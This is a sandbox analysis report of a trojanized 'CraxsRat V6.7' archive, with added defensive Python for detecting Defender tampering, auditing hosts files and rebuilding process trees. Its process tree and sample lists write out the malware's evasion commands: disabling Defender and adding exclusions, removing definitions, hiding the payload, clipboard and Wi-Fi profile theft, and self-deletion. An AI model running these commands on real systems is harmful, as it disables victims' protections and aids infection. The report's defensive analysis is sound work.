Analysis
  max time kernel:  1198s
  max time network: 1175s
  platform:         windows11-21h2_x64
  resource:         win11-20240508-en
  resource tags:    arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
  submitted:        22-05-2024 16:01

Behavioral task: behavioral1
  Sample:   CraxsRat V6.7.rar
  Resource: win10v2004-20240508-en

General
  Target: CraxsRat V6.7.rar
  Size:   224.5MB
  MD5:    16486345e6b20f7ae900fb02b89f3b08
  SHA1:   a9125234f9ff3618bde6d59a7a139ab34ecfc9ec
  SHA256: 46cee2ff6c518b75b82f818002e3434c72f12539ad07995c77e383ef52fb33fa
  SHA512: 21f57b4e40a4035bb5d97b08d1523b097ccfa37056af7ca3aa342af50f5b614ff1bdf1faf6a307268dcb006faa1fda0562963ec60066e519449b9280a9675276
  SSDEEP: 6291456:Crxm6Seo6ykkRm0yP8SkmYZoryFWDXFEe:Cr97d78WQWJEe
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
  - 3636 powershell.exe
  - 928 powershell.exe
  - 1888 powershell.exe
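The commands behind this signature appear further down in the process tree: Add-MpPreference -ExclusionPath for the dropped binary and for a Start Menu\StartUp\ .scr path, one Set-MpPreference call that turns off real-time monitoring, IOAV, script scanning and cloud reporting, and MpCmdRun.exe -RemoveDefinitions -All. The Python below is an added example, not part of this report or of the sandbox's signature engine: a small rule set run over process-creation command lines (Sysmon event 1, EDR telemetry, or the Processes section of a report like this one) that flags those Defender changes together with the other evasion steps the tree shows (attrib on the hosts file, attrib +h +s on the payload, the SecurityCenter2 AV query, the encoded PowerShell launch, and the ping-then-del self-removal). The rule names, the base64 stand-in used for the elided -EncodedCommand payload, and the two benign control lines are assumptions made for the example; the other sample lines are copied from this report.

```python
"""Flag Defender-tampering and evasion command lines of the kind seen in this report.

Added example: the rules are not the sandbox's own signature logic. Matching is
done against the whole command line because the tampering is in the arguments,
not in the image name (cmd.exe and powershell.exe are both legitimate).
"""
import re
from collections import defaultdict

RULES = [
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)\b", re.I | re.S)),
    ("defender_disable",
     re.compile(r"Set-MpPreference\b.*?(?:-Disable\w+\s+\$?true\b"
                r"|-MAPSReporting\s+Disabled\b|-SubmitSamplesConsent\s+(?:NeverSend|2)\b)",
                re.I | re.S)),
    ("defender_remove_definitions",
     re.compile(r"MpCmdRun\b.*?-RemoveDefinitions\b", re.I | re.S)),
    ("encoded_powershell",   # -e / -ec / -enc / -EncodedCommand followed by base64
     re.compile(r"powershell(?:\.exe)?\b.*?\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
                re.I | re.S)),
    ("hosts_file_attrib",    # read-only bit toggled on the hosts file before/after a write
     re.compile(r"attrib\s+[-+]r\s+.*?drivers\\etc\\hosts\b", re.I | re.S)),
    ("hidden_system_attrib", # payload hidden from Explorer with +h +s
     re.compile(r"attrib\s+(?:\+h\s+\+s|\+s\s+\+h)\b", re.I | re.S)),
    ("av_product_enum",
     re.compile(r"SecurityCenter2\b.*?AntivirusProduct\b", re.I | re.S)),
    ("delayed_self_delete",  # ping used as a sleep, then del of the running binary
     re.compile(r"ping\s+\S+\s+-n\s+\d+.*?&&\s*del\b", re.I | re.S)),
]

# Rules that mean Defender itself was changed, not merely probed.
TAMPERING_RULES = {"defender_exclusion", "defender_disable", "defender_remove_definitions"}


def scan(cmdlines):
    """Return {rule_name: [matching command lines]} for every rule that fired."""
    hits = defaultdict(list)
    for line in cmdlines:
        for name, rx in RULES:
            if rx.search(line):
                hits[name].append(line)
    return dict(hits)


def defender_tampering(hits):
    """Sorted list of the tampering rules present in a scan result."""
    return sorted(TAMPERING_RULES & hits.keys())


def verdict(hits):
    """Collapse rule hits into a triage verdict."""
    if TAMPERING_RULES & hits.keys():
        return "defender_tampering"
    return "suspicious" if hits else "clean"


# Command lines copied from the Processes section of this report, plus a
# constructed -EncodedCommand line (the report's payload is elided) and two
# constructed benign controls (the last two lines).
SAMPLE_CMDLINES = [l for l in r"""
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe'"
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe""
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe""
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBEAGEAdABlAA==
powershell Get-MpPreference
cmd.exe /c "tasklist /FO LIST"
""".splitlines() if l.strip()]

if __name__ == "__main__":
    result = scan(SAMPLE_CMDLINES)
    print("verdict:", verdict(result))
    for rule, lines in sorted(result.items()):
        print(f"{rule}: {len(lines)} hit(s)")
```

Run as a script it prints the verdict and a per-rule hit count. The rules key on arguments rather than image names because the same change can be launched through cmd.exe, a scheduled task or a WMI call; on a live host, Get-MpPreference (ExclusionPath, DisableRealtimeMonitoring) and the Windows Defender operational log (event 5007 for a configuration change, 5001 for real-time protection disabled) confirm whether the change actually landed.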
Drops file in Drivers directory (3 IoCs)
Processes:
  - File opened for modification: C:\Windows\System32\drivers\etc\hosts (attrib.exe)
  - File opened for modification: C:\Windows\System32\drivers\etc\hosts (CraxsRat.exe)
  - File opened for modification: C:\Windows\System32\drivers\etc\hosts (attrib.exe)
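Before touching the hosts file the sample resolves its location from HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath, then clears and restores the read-only attribute around the write (the REG QUERY and attrib -r / attrib +r entries in the process tree). The Python below is an added example, not part of this report: the matching integrity check, which resolves the path the same way on Windows, then flags hosts entries that sinkhole a name (0.0.0.0 or a loopback address) or redirect it to another address, raising the severity for names on a watchlist of update or security-vendor domains. The hosts content, the watchlist domains and the two-level severity scheme are constructed for the example.

```python
"""Audit a hosts file for sinkholed or redirected names.

Added example, not part of this report. On Windows the file location is read
from the DataBasePath registry value, as the sample does, instead of assuming
%SystemRoot%\\System32\\drivers\\etc; elsewhere /etc/hosts is used.
"""
import ipaddress
import os

# Names that legitimately map to loopback or unspecified addresses.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}


def hosts_path():
    """Resolve the hosts file path; DataBasePath is REG_EXPAND_SZ, so expand it."""
    try:
        import winreg
    except ImportError:
        return "/etc/hosts"
    key = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
        base, _ = winreg.QueryValueEx(k, "DataBasePath")
    return os.path.join(os.path.expandvars(base), "hosts")


def parse_hosts(text):
    """Yield (ip, hostname) once per hostname token.
    Comments and blank lines are skipped; a line whose first token is not an
    address is skipped here (real tooling should report it as malformed)."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue
        for name in names:
            yield ip, name.lower()


def audit_hosts(text, watchlist=()):
    """Return one finding per non-local name.
    kind:     'sinkholed' for 0.0.0.0/loopback targets, 'redirected' otherwise.
    severity: 'high' when the name equals or sits under a watchlist domain."""
    findings = []
    for ip, name in parse_hosts(text):
        if name in LOCAL_NAMES:
            continue
        kind = "sinkholed" if ip.is_unspecified or ip.is_loopback else "redirected"
        watched = any(name == w or name.endswith("." + w) for w in watchlist)
        findings.append({"host": name, "ip": str(ip), "kind": kind,
                         "severity": "high" if watched else "low"})
    return findings


# Constructed hosts content and watchlist for the example (.test names are
# reserved and 198.51.100.0/24 is documentation space; nothing here is from the report).
WATCHLIST = ("example-update.test", "example-av-vendor.test")
SAMPLE_HOSTS = """\
# default header comment
127.0.0.1       localhost
::1             localhost
0.0.0.0         www.example-update.test            # sinkholed update host
198.51.100.7    login.example-bank.test            # redirected to another address
127.0.0.1       example-av-vendor.test api.example-av-vendor.test
not-an-ip       garbage.test
"""

if __name__ == "__main__":
    print("hosts file:", hosts_path())
    for finding in audit_hosts(SAMPLE_HOSTS, WATCHLIST):
        print(finding)
```

Point the script at the real file with open(hosts_path()).read() to audit a host; the read-only attribute the sample toggles is not a control (any administrator can clear it, as attrib -r shows), so the entries themselves are what to baseline and diff.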
Executes dropped EXE (4 IoCs)
Processes:
  - 4624 CraxsRat.exe
  - 3156 CraxsRat.exe
  - 1348 rar.exe
  - 3264 z.exe

Loads dropped DLL (16 IoCs)
Processes:
  - 3156 CraxsRat.exe (16 loads)

Obfuscated with Agile.Net obfuscator (1 IoC)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control-flow obfuscation.
Yara match (rule agile_net):
  - behavioral2/memory/3264-1296-0x000002CBC8950000-0x000002CBC8A88000-memory.dmp
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials and similar secrets.

Yara matches (rule upx):
  Dropped files under C:\Users\Admin\AppData\Local\Temp\_MEI46242\ (a PyInstaller one-file extraction directory; python310.dll indicates a bundled Python 3.10 runtime):
    python310.dll, _ctypes.pyd, libffi-7.dll, libcrypto-1_1.dll, select.pyd, _ssl.pyd, _sqlite3.pyd, _socket.pyd, _queue.pyd, _lzma.pyd, _hashlib.pyd, _decimal.pyd, _bz2.pyd, unicodedata.pyd, libssl-1_1.dll, sqlite3.dll
  Memory regions of PID 3156 (CraxsRat.exe); each region matched in several successive dumps (dump ids 1045-1107, 1279-1334 and 1504-1518):
    0x00007FFA49AF0000-0x00007FFA49F56000
    0x00007FFA635D0000-0x00007FFA635DF000
    0x00007FFA5AD90000-0x00007FFA5ADB4000
    0x00007FFA5A620000-0x00007FFA5A64C000
    0x00007FFA5A440000-0x00007FFA5A45F000
    0x00007FFA55E30000-0x00007FFA55FAA000
    0x00007FFA5AA20000-0x00007FFA5AA38000
    0x00007FFA596B0000-0x00007FFA596C9000
    0x00007FFA635C0000-0x00007FFA635CD000
    0x00007FFA570B0000-0x00007FFA570DE000
    0x00007FFA48920000-0x00007FFA48C99000
    0x00007FFA4FAE0000-0x00007FFA4FB98000
    0x00007FFA5E940000-0x00007FFA5E94D000
    0x00007FFA50DA0000-0x00007FFA50DB5000
    0x00007FFA42FC0000-0x00007FFA430D8000
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flows:
  - flow 4: ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger (64 IoCs)
Processes:
  - 3264 z.exe (64 calls)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Detects videocard installed (1 TTP, 1 IoC)
Uses WMIC.exe to determine the installed video card.

Enumerates processes with tasklist (1 TTP, 4 IoCs)
Processes:
  - 1080 tasklist.exe
  - 692 tasklist.exe
  - 2032 tasklist.exe
  - 404 tasklist.exe

Gathers system information (1 TTP, 1 IoC)
Runs systeminfo.exe.

Modifies registry class (5 IoCs)
Processes:
  - Key created: \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings (cmd.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings (OpenWith.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.apk\DefaultIcon (z.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.apk (z.exe)
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.apk\DefaultIcon\ = "C:\\Users\\Admin\\Desktop\\CraxsRat V6.7\\CraxsRat VIP\\CraxsRat VIP\\res\\Icons\\apk.ico" (z.exe)

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (20 IoCs)
Processes (PID image, number of records):
  - 928 powershell.exe (2)
  - 2220 powershell.exe (2)
  - 3636 powershell.exe (2)
  - 1136 powershell.exe (3)
  - 1888 powershell.exe (3)
  - 3888 powershell.exe (2)
  - 4524 powershell.exe (2)
  - 3360 powershell.exe (2)
  - 4268 powershell.exe (2)
Suspicious use of AdjustPrivilegeToken (64 IoCs; the list stops at 64 entries)
Processes, grouped by PID in order of first appearance:
  - 1200 7zG.exe: SeRestorePrivilege, 35, SeSecurityPrivilege (twice)
  - 928 powershell.exe: SeDebugPrivilege
  - 2220 powershell.exe: SeDebugPrivilege
  - 3636 powershell.exe: SeDebugPrivilege
  - 1080 tasklist.exe: SeDebugPrivilege
  - 692 tasklist.exe: SeDebugPrivilege
  - 996 WMIC.exe (the same sequence recorded twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - 1136 powershell.exe: SeDebugPrivilege
  - 2032 tasklist.exe: SeDebugPrivilege
  - 1888 powershell.exe: SeDebugPrivilege
  - 404 tasklist.exe: SeDebugPrivilege
  - 3888 powershell.exe: SeDebugPrivilege
  - 4524 powershell.exe: SeDebugPrivilege
  - 1932 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege (list ends here)
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
  - 1200 7zG.exe
  - 3264 z.exe

Suspicious use of SendNotifyMessage (1 IoC)
Processes:
  - 3264 z.exe

Suspicious use of SetWindowsHookEx (1 IoC)
Processes:
  - 5040 OpenWith.exe
Suspicious use of WriteProcessMemory (64 IoCs; every parent/child pair below is recorded twice, once per call)
Processes (parent PID image -> child PID image):
  - 4624 CraxsRat.exe -> 3156 CraxsRat.exe
  - 3156 CraxsRat.exe -> sixteen cmd.exe children, each of which spawns one tool:
      1720 cmd.exe -> 928 powershell.exe
      3488 cmd.exe -> 2220 powershell.exe
      5084 cmd.exe -> 4072 mshta.exe
      1552 cmd.exe -> 3500 attrib.exe
      1208 cmd.exe -> 3636 powershell.exe
      3948 cmd.exe -> 692 tasklist.exe
      3644 cmd.exe -> 1080 tasklist.exe
      1832 cmd.exe -> 996 WMIC.exe
      3940 cmd.exe -> 1136 powershell.exe
      3860 cmd.exe -> 2032 tasklist.exe
      3724 cmd.exe -> 4696 tree.com
      5040 cmd.exe -> 1528 netsh.exe
      1796 cmd.exe -> 4728 systeminfo.exe
      2304 cmd.exe -> 708 reg.exe
      1696 cmd.exe -> 1888 powershell.exe
      2128 cmd.exe (no child recorded; the list stops at 64 entries)
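The records in this signature are a flattened parent/child list: each "PID a wrote to memory of b" pair appears twice, once per call, and the tree has to be rebuilt from them. The Python below is an added example, not part of this report: it parses such records into a process tree, walks the lineage of any PID back to its top-most recorded ancestor, and scores a lineage by how many distinct discovery and evasion LOLBins it reaches, which is the shape of a "one parent, many recon tools" detection. The sample input is copied from the records above (with the first pair kept in its duplicated form); the tool lists and the burst threshold of four distinct discovery tools are assumptions made for the example.

```python
"""Rebuild a process tree from flattened WriteProcessMemory parent/child records.

Added example, not part of this report. The record grammar is the one used by
the signature above: "PID <parent> wrote to memory of <child> <parent>
<parent image> <child image>". Tool groupings and the threshold are assumptions.
"""
import re
from collections import defaultdict, deque

RECORD = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) (\S+)")

# Assumed groupings for the example: what a discovery burst and evasion look like.
DISCOVERY_TOOLS = {"tasklist.exe", "systeminfo.exe", "wmic.exe", "netsh.exe",
                   "reg.exe", "tree.com", "getmac.exe"}
EVASION_TOOLS = {"powershell.exe", "mshta.exe", "attrib.exe"}


def parse_records(text):
    """Yield unique (parent_pid, parent_image, child_pid, child_image) tuples.
    The sandbox logs every call, so the same pair appears more than once."""
    seen = set()
    for m in RECORD.finditer(text):
        ppid, cpid = int(m.group(1)), int(m.group(2))
        if (ppid, cpid) not in seen:
            seen.add((ppid, cpid))
            yield ppid, m.group(3), cpid, m.group(4)


class ProcTree:
    def __init__(self, records):
        self.children = defaultdict(list)
        self.parent = {}
        self.image = {}
        for ppid, pimg, cpid, cimg in records:
            self.children[ppid].append(cpid)
            self.parent[cpid] = ppid
            self.image.setdefault(ppid, pimg)  # a PID seen first as a child keeps that name
            self.image[cpid] = cimg

    def descendants(self, root):
        """Breadth-first (depth, pid) pairs below root."""
        out = []
        queue = deque((1, c) for c in self.children.get(root, []))
        while queue:
            depth, pid = queue.popleft()
            out.append((depth, pid))
            queue.extend((depth + 1, c) for c in self.children.get(pid, []))
        return out

    def lineage(self, pid):
        """Image names from the top-most recorded ancestor down to pid."""
        chain = [pid]
        while chain[-1] in self.parent:
            chain.append(self.parent[chain[-1]])
        return [self.image[p] for p in reversed(chain)]

    def lolbin_fanout(self, root):
        """Distinct discovery and evasion LOLBins reachable from root."""
        images = {self.image[pid].lower() for _, pid in self.descendants(root)}
        return {"discovery": sorted(images & DISCOVERY_TOOLS),
                "evasion": sorted(images & EVASION_TOOLS)}

    def discovery_burst(self, root, threshold=4):
        """True when one lineage reaches at least `threshold` distinct discovery tools."""
        return len(self.lolbin_fanout(root)["discovery"]) >= threshold


# Copied from the WriteProcessMemory signature above; the first pair is kept
# duplicated as the sandbox lists it, the remaining pairs are listed once.
SAMPLE_RECORDS = """
PID 4624 wrote to memory of 3156 4624 CraxsRat.exe CraxsRat.exe
PID 4624 wrote to memory of 3156 4624 CraxsRat.exe CraxsRat.exe
PID 3156 wrote to memory of 1720 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 3488 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 5084 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 1552 3156 CraxsRat.exe cmd.exe
PID 1720 wrote to memory of 928 1720 cmd.exe powershell.exe
PID 3488 wrote to memory of 2220 3488 cmd.exe powershell.exe
PID 3156 wrote to memory of 1208 3156 CraxsRat.exe cmd.exe
PID 5084 wrote to memory of 4072 5084 cmd.exe mshta.exe
PID 1552 wrote to memory of 3500 1552 cmd.exe attrib.exe
PID 1208 wrote to memory of 3636 1208 cmd.exe powershell.exe
PID 3156 wrote to memory of 3948 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 3644 3156 CraxsRat.exe cmd.exe
PID 3644 wrote to memory of 1080 3644 cmd.exe tasklist.exe
PID 3948 wrote to memory of 692 3948 cmd.exe tasklist.exe
PID 3156 wrote to memory of 1832 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 3940 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 3860 3156 CraxsRat.exe cmd.exe
PID 1832 wrote to memory of 996 1832 cmd.exe WMIC.exe
PID 3940 wrote to memory of 1136 3940 cmd.exe powershell.exe
PID 3156 wrote to memory of 3724 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 5040 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 1796 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 2304 3156 CraxsRat.exe cmd.exe
PID 3156 wrote to memory of 1696 3156 CraxsRat.exe cmd.exe
PID 3860 wrote to memory of 2032 3860 cmd.exe tasklist.exe
PID 3724 wrote to memory of 4696 3724 cmd.exe tree.com
PID 1796 wrote to memory of 4728 1796 cmd.exe systeminfo.exe
PID 2304 wrote to memory of 708 2304 cmd.exe reg.exe
PID 1696 wrote to memory of 1888 1696 cmd.exe powershell.exe
PID 5040 wrote to memory of 1528 5040 cmd.exe netsh.exe
PID 3156 wrote to memory of 2128 3156 CraxsRat.exe cmd.exe
"""

if __name__ == "__main__":
    tree = ProcTree(parse_records(SAMPLE_RECORDS))
    print("lineage of 1528:", " -> ".join(tree.lineage(1528)))
    print("fan-out below 3156:", tree.lolbin_fanout(3156))
    print("discovery burst:", tree.discovery_burst(3156))
```

One caveat this report illustrates itself: PID 5040 appears as OpenWith.exe under SetWindowsHookEx and as a cmd.exe child of 3156 here, so keying a tree on bare PIDs is only safe within a short window; real telemetry should key on a process GUID or on (PID, creation time).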
Views/modifies file attributes (1 TTP, 3 IoCs)
Processes:
  - 1220 attrib.exe
  - 3500 attrib.exe
  - 4968 attrib.exe
Processes
Each entry gives the image path, then the recorded command line, then the signatures it triggered; indentation shows the parent/child depth.

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\CraxsRat V6.7.rar"
  - Modifies registry class

C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\CraxsRat V6.7\" -spe -an -ai#7zMap16116:84:7zEvent25911
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\NOTEP AD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\ID.txt

C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe
  "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe
    "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe'"
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal error ! ', 0, 'CraxsRat', 0+16);close()""
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\mshta.exe
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal error ! ', 0, 'CraxsRat', 0+16);close()"

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe""
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\attrib.exe
        attrib +h +s "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"
        - Views/modifies file attributes

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\tasklist.exe
        tasklist /FO LIST
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\tasklist.exe
        tasklist /FO LIST
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\Wbem\WMIC.exe
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-Clipboard
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\tasklist.exe
        tasklist /FO LIST
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\tree.com
        tree /A /F

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\netsh.exe
        netsh wlan show profile

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\systeminfo.exe
        systeminfo
        - Gathers system information

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\reg.exe
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2prs3qo5\2prs3qo5.cmdline"
